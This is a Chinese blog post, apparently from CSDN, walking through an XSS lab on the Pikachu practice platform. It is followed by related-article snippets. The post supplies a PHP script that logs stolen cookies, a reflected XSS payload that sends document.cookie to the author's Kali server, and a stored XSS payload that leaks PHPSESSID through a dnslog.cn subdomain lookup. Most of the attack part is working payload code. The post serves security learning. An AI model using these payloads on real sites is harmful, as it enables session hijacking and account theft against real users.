XSS漏洞利用实验——使用两种方式外带用户数据

已于 2024-10-15 22:37:11 修改
阅读量883 收藏 20
点赞数 19
分类专栏: XSS 文章标签: xss javascript 安全 web安全 网络安全 安全威胁分析 前端
于 2024-10-15 21:42:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44656518/article/details/142911582
版权

0x00 前言

关于XSS的基本知识可以查看

https://blog.csdn.net/weixin_44656518/article/details/142832967?spm=1001.2014.3001.5501

0x01 使用自建服务器外带数据(反射型XSS)

使用实验环境:kali虚拟机,pikachu漏洞实验平台

1.查看kali虚拟机ip地址

我这里是192.168.80.131
不同虚拟机配置ip会有变动

2.在kali虚拟机中启动apache2环境

//启动apache2
service apache2 start

//查看apache2状态
netstat -anpt | grep apache2

3.进入 /var/www/html 目录

cd /var/www/html

4.创建接收cookie用的文件cookie.php并在文件中写入代码

vim cookie.php

<?php
  $cookie = $_GET['cookie'];
  $log = fopen("cookie.txt","a");
    fwrite($log,$cookie."\n");
    fclose($log);
?>

5.给文件最高权限

chmod 777 /var/www/html/cookie.php

6.打开pikachu漏洞实验平台,选择反射型xss(post)

输入用户名密码登录(默认用户名密码 admin/123456)

7.编写钓鱼的提交代码

将第一步kali的ip地址填入url中

<script>window.open('http://192.168.80.131/cookie.php?cookie='+document.cookie)</script>

8.将钓鱼代码填入并点击提交

此时会弹出一个空白页面

9.回到kali虚拟机中

查看cookie.txt文件
能够看到该用户的用户名,md5加密后的密码,以及PHPSESSID

10.使用cmd5查询后可以看到密码为123456

0x02 利用DNSlog外带数据(存储型XSS)

1.打开DNSlog网站

http://dnslog.cn/

点击 Get SubDomain 获取域名

2.根据域名编写钓鱼代码

<script>
var arr=document.cookie.split(/[;=]/);
var url = "http://"+arr[3]+".710e3m.dnslog.cn";
document.write('<img src="'+url+'"/>');
</script>

3.将代码复制到pikachu漏洞练习平台的存储型xss的留言框内并提交

4.这里可以看到一个空的图片,说明钓鱼代码已经成功保存到数据库

5.回到DNSlog页面

点击刷新,可以看到下方用户的PHPSESSID数据

可以看到和浏览器内的数据是一致的

0x04 如有疑问,欢迎评论区留言,制作不易,请多多包涵 

网络安全XSS之Cookie外带攻击姿势及例题详析
等风来
05-19 9142
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
热门推荐
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全]XSS之Cookie外带攻击姿势详析
Hacker_LaoYi的博客
11-28 1586
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而。使用 onerror 事件的方式,在图片加载失败时触发一个错误事件,通过 window.open 方法打开了指定的攻击机地址,并传递cookie。执行后,服务器将启动并开始监听指定的 IP 地址和端口号,等待客户端连接。当用户访问包含恶意代码的页面时,会触发 XSS 攻击。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并。
DNSLog漏洞探测(三)之XSS漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-12 1713
DNSLog的平台实际使用很长见的一种情况就是针对漏洞无回显的情况,我们通过让受害者的服务器主动发起对DNSLog服务平台的请求去外带一些信息,但更多的使用场景是我们仅仅使用DNSLog去作为探测漏洞是否存在的一种手段。现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XSS漏洞。通过前面的学习,我们已经明白了什么是DNSLog平台,那么DNSLog平台到底能为我们做些什么呢?
穿透式侦查:DNSLog在红队攻防中的降维打击
最新发布
安全瞭望Sec
03-26 1162
DNSLog 是一种基于 DNS 协议的隐蔽通信技术,主要用于网络安全领域的漏洞探测与攻击验证
XSS研究1-来自外部的XSS攻击
dengkuituo0680的博客
12-05 167
引入: 上文中我们的例子是研究了来自内部的XSS攻击,通过输送一段有害js代码到受害者的机器,让其在受害者的域上运行这段有害JS代码来得到入侵目的。现在我们来看下来自外部的XSS攻击。 实践: 下面还是按照惯例,我用白话文来解释下什么是来自外部的XSS攻击。 假设我是攻击者,A是受害者,我知道A有个习惯,他会经常去某个奢侈品消费网站登录,然后每次登录用他的积分买很多东...
一篇 带你了解 XSS——(上篇)
qq_62987084的博客
10-14 1312
关于XSS的介绍
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4552
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3971
web安全-SSTI模板注入漏洞
【计算机网络】计算机三级计算机网络笔记记录
m0_63949551的博客
11-30 2889
计算机等级三级计算机网络
web安全渗透测试介绍与实际操作典例分析
HBohan的博客
06-23 1939
渗透测试的意义 渗透测试是站在第三者的角度来思考企业系统的安全性的,通过渗透测试可以发觉企业潜在却未纰漏的安全性问题。企业可以根据测试的结果对内部系统中的不足以及安全脆弱点进行加固以及改善,从而使企业系统变得更加安全,减低企业的风险。 渗透测试的分类 渗透测试按照渗透的方法与视角可以分为以下三类: 黑盒测试 黑盒测试(Black-box Testing)也称为外部测试(External Testing)。采用这种方式时,渗透测试团队将从一个远程网络位置来评估目标网络基础设施,并没有任何目标网络内部拓扑等相关
XSS研究4-来自外部的XSS攻击的防范
weixin_34000916的博客
11-15 161
引入: 这篇文章我们来专门探讨如何防范来自外部的XSS攻击。 实践: 其实从http://supercharles888.blog.51cto.com/609344/1339921文章中可以看出,主要的攻击手段无让攻击者机器上运行一段JS,这段js中包含一段对于document.cookie的处理,如果这个能拿到正确的值,那么就可以用获取的信息发送...
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1982
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
写bat脚本双击执行
qq_35911118的博客
04-08 3134
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
使用XSS漏洞获取cookies
Decaede的博客
01-26 1577
使用XSS漏洞获取cookies
渗透测试&护网&网络安全---xss
zhenghdmax的博客
03-10 1078
例如,使用<img src="http://[恶意域名]/<敏感数据>">,当浏览器尝试加载该图片时,会向恶意域名对应的DNS服务器发送请求,携带敏感数据作为子域名或路径参数,攻击者通过监控DNS服务器日志获取数据。:审视网页中所有接收用户输入的地方,如表单字段、URL参数、搜索框等,尝试输入特殊字符(如<script>、<img>等),观察页面是否过滤或转义。:攻击者将恶意脚本存储在目标网站,当管理员等高权限用户访问时,脚本执行,可能窃取管理员会话、修改网站配置、添加恶意用户等,实现提权操作。
CNVD漏洞数据采集详解
个人博客:www.1042.net
10-24 1561
完成上述步骤后,您将获得未经清洗与处理的漏洞 XML 文件。在数据的应用阶段,可以进一步结合数据分析手段、自然语言处理技术进行信息提取与漏洞特性挖掘。在网络安全快速演变的背景下,持续的漏洞数据监测和分析将为机构提供坚实的安全基础。随着 CNVD 更新的持续和技术的革新,希望本指南能为网络安全从业者提供实用支持,并帮助大家在信息安全的道路上走得更远。通过本次扩展,我们在详细讲解每个实施步骤的同时,还提供了重要的背景知识及操作细节,以帮助您充分利用 CNVD 数据进行安全研究。
XSS学习总结
ad12456的博客
03-28 1567
xss学习
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7628
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值